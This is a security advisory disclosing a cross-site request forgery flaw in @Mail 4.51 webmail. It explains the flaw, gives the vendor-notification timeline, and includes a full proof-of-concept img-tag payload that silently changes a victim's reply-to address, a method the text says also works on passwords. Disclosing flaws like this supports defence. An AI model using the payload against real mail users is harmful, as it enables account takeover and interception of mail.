******************** Netragard,  L.L.C  Advisory* *******************
ATMAIL-XRRF-ADVISORY-20061206

			     
                     Strategic Reconnaissance Team

              ------------------------------------------------ 
              http://www.netragard.com -- "We make I.T. Safe."



[POSTING NOTICE]
----------------------------------------------------------------------
If you intend to post this advisory on your web page please create a 
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated.



[About Netragard]
----------------------------------------------------------------------
Netragard is a unique I.T. Security company whose services are 
fortified by continual vulnerability research and development. This 
ongoing research, which is performed by our Strategic Reconnaissance 
Team, specifically focuses on Operating Systems, Software Products and 
Web Applications commonly used by businesses internationally. We apply 
the knowledge gained by performing this research to our professional 
security services. This in turn enables us to produce high quality 
deliverables that are the product of talented security professionals 
and not those of automated scanners and tools.  This advisory is the 
product of research done by the Strategic Reconnaissance Team.


[Advisory Information]
----------------------------------------------------------------------
Contact				: Adriel T. Desautels
Researcher			: Philippe C. Caturegli
Advisory ID			: NETRAGARD-20061218
Product Name			: @ Mail
Product Version		: 4.51
Vendor Name			: Calacode
Type of Vulnerability	: Cross Site Request Forgery
Effort				: Easy

----------------------------------------------------------------------
Netragard Security Note:
 
Source code obfuscation does not reduce the risk profile of any 
application as it has no impact on vulnerabilities that might exist
within a particular application. @Mail code was obfuscated using basic
obfuscation techniques. 





[Product Description]
----------------------------------------------------------------------
"@Mail is a feature rich Email Solution, providing a complete WebMail 
interface for accessing email-resources via a web-browser or wireless 
device."


--http://www.atmail.com--





[Technical Summary]
----------------------------------------------------------------------
It is possible to take control of an @Mail webmail email account 
by exploiting a Cross Site Request Forgery (XRSF) vulnerability in
the @Mail webmail product. An attacker can send a specially crafted
email to any @Mail webmail user with a forged "img" tag. This forged
tag, if crafted properly, will inject new settings into the @Mail 
webmail users account. 

Example: 
http://server/webmail/util.pl?func=settings&<forged settings in here>





[Technical Details]
----------------------------------------------------------------------
Netragard has discovered a critical flaw in @Mail webmail that allows
an attacker to change arbitrary settings in a users @Mail webmail 
account. This flaw targets the util.pl page that is used to manage a 
users account settings. 

By default this page uses "HTTP POST" to commit changes. Netragard has
found that it is also possible to commit settings changes using an "HTTP
GET".

@Mail webmail's default configuration is to disable the display of 
images for users that are not in the current accounts address book. 
Users contained in the address book are considered to be trusted.

@Mail webmail's image loading security feature can be circumvented
by using specially crafted "img" tags embedded in emails sent to 
@Mail webmail users. In fact, when an external image is referenced
by using the "img" tag, @Mail webmail automatically retrieves the
image and loads the image as a part of the email.

If the "img" tag is replaced by a specially crafted URL then an 
attacker can commit changes to the targeted @Mail webmail email 
account. 





[Proof Of Concept]  
----------------------------------------------------------------------
The below example changes the reply to address of the victim to 
attacker@haxor.org. Similar attacks can be used to change other user
settings including the users password. 

	
<img src=http://victim.com/atmail/webmail/util.pl?func=settings&save=1&
RealName=&ReplyTo=attacker%40hax0r.org&MboxOrder=id&EmailHeaders=Standard&
FontStyle=Verdana&Language=english&LeaveMsgs=1&Refresh=1200&MsgNum=25&
TimeFormat=%25l%3A%25M+%25p&DateFormat=%25e%2F%25m%2F%25y&TimeZone=America%2FNew_York&EmailEncoding=UTF8&DisplayImages=2&AutoComplete=1&Advanced=1&HtmlEditor=1&
Signature=&save=Save+Settings&AutoReply=&PKIenable=1&PGPenable=0&SMIMEtown=&
SMIMEstate=&SMIMEcountry=&PGPpassword=&PGPpasswordconfirm=&LoginType=xul&
PrimaryColor=%23EBE9E4&SecondaryColor=%23F4F4F4&ThirdColor=%23FAFAFA&
HeaderColor=%23F5F5F5&HeadColor=%2306082C&BgColor=%23F9F9F9&TextColor=%2306082C&
TextHeadColor=%23303030&LinkColor=%23000000&VlinkColor=%23000033&OnColor=%23F3F3F3&OffColor=%23FFFFFF&SelectColor=%23E4EEF8&TopBg=imgs%2Fgraygrad.g>
 




[Vendor Status] 
----------------------------------------------------------------------
Vendor Notified on 12/18/06
Netragard held on release date for vendor 1/05/07
Vendor is no longer responding to emails from Netragard 1/25/07
Advisory released 1/25/07
Advisory published 1/30/07



[Disclaimer]
---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially 
dangerous security hole. This advisory is not an attempt to solicit
business.

<a href="http://www.netragard.com">http://www.netragard.com</a>

ATMAIL-XRRF-ADVISORY-20061206